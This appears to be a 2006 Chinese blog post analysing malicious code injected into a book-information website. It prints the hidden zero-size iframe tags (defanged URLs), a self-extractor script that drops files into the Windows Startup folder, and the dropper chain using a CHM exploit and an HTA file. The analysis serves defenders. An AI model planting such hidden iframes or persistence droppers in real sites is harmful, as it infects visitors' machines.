某图书信息网被加入恶意代码
来源:互联网 发布:mac版pscs3中文破解版 编辑:程序博客网 时间:2024/06/10 05:32
endurer 原创
2006-11-08 第1版
该图书信息网首页首部被加入代码:
<iframe src=hxxp://www*.book***info**.com.cn/change.htm width=0 height=0 frameborder=0></iframe>
change.htm 的内容为:
/--------
<html>
<iframe src="hxxp://www*.book***info**.com.cn/ind/caohui.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://hk.myblog.yahoo.com/f*4-stu**dent*" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://blog.q**oo*z*a.hk/tmcf4student/" width="0" height="0" frameborder="0"></iframe>
</html>
--------/
hxxp://www*.book***info**.com.cn/ind/caohui.htm 的内容为加入多余空格的利用CHM漏洞的恶意代码,会下载2个文件:
1、caohui.gif 为加入多余空格的脚本程序,文件长度为 117 KB (120,006 字节),功能为:创建并运行c:/caohui.hta。
c:/caohui.hta的功能为:
1)从IE临时文件夹中寻找caohui.css,复制为C:/soft.exe并运行。
2)创建文件c:/wins.bat来删除自己。
caohui.css 其实是一个WinRAR制作的自解压文件,文件长度为 20,006 字节,解压脚本为:
/--------
包含; 下列註解包含自解檔指令碼命令
Path=C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/
SavePath
Silent=1
Overwrite=1
--------/
把文件解压到C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/ 下……
这对使用简体中文版的Windows用户不起作用罢?^_^!
包中的文件为 dnserror.htm,文件长度为 3,260 字节,其中包含代码:
/--------
<iframe src="hxxp://home.tmcss.edu.hk/~t*m*c-02**016/change.htm" width="0" height="0" frameborder="0"></iframe>
--------/
- 某图书信息网被加入恶意代码
- 某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
- 信息网
- 恶意代码
- 恶意代码
- 某县政府信息网被挂马 haha.exe
- 某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码
- Google Blogger 被劫持,并散播恶意代码
- 网页被注入iframe恶意代码清除工具
- 某县农业信息网挂马 Worm.Win32.AutoRun.umf
- 漏洞信息网
- 图书
- 图书
- 图书
- 图书
- 图书
- 图书
- IE被某些网站恶意代码修改的问题解决方法心得
- 4.5~4.7
- 用(10+2)*5法来对付惰性
- 初学SWT的一些经验分享以及注意事项
- database design process
- [转]Swing技巧总结
- 某图书信息网被加入恶意代码
- Fundamentals of Relational Database Design
- Java连接各种数据库的实例
- JSP环境的搭建
- 2.1.2 TCP/IP协议集
- 中了MSN FUNNY病毒后,电脑登录时总是注销,无法进入系统的解决办法
- About Hibernate
- first day
- JavaScript问题集合